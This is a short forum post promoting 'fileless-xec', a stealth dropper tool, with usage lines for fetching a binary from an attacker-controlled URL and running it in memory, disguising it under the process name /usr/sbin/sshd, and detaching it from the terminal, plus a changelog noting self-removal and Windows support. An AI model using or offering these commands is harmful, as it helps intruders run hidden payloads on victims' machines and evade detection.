itsMe Posted November 18, 2021 Share Posted November 18, 2021 This is the hidden content, please Sign In or Sign Up fileless-xec – A stealth dropper Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine Short story fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk simple usage fileless-xec <binary_url> execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url> retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url> detach program execution from tty: setsid fileless-xec […] 3.0.0 Latest Changed Rebranding from curlNexecto fileless-xec Added Self remove of fileless-xec dropper Server mode Windows support Exec without using memfd syscall This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
Recommended Posts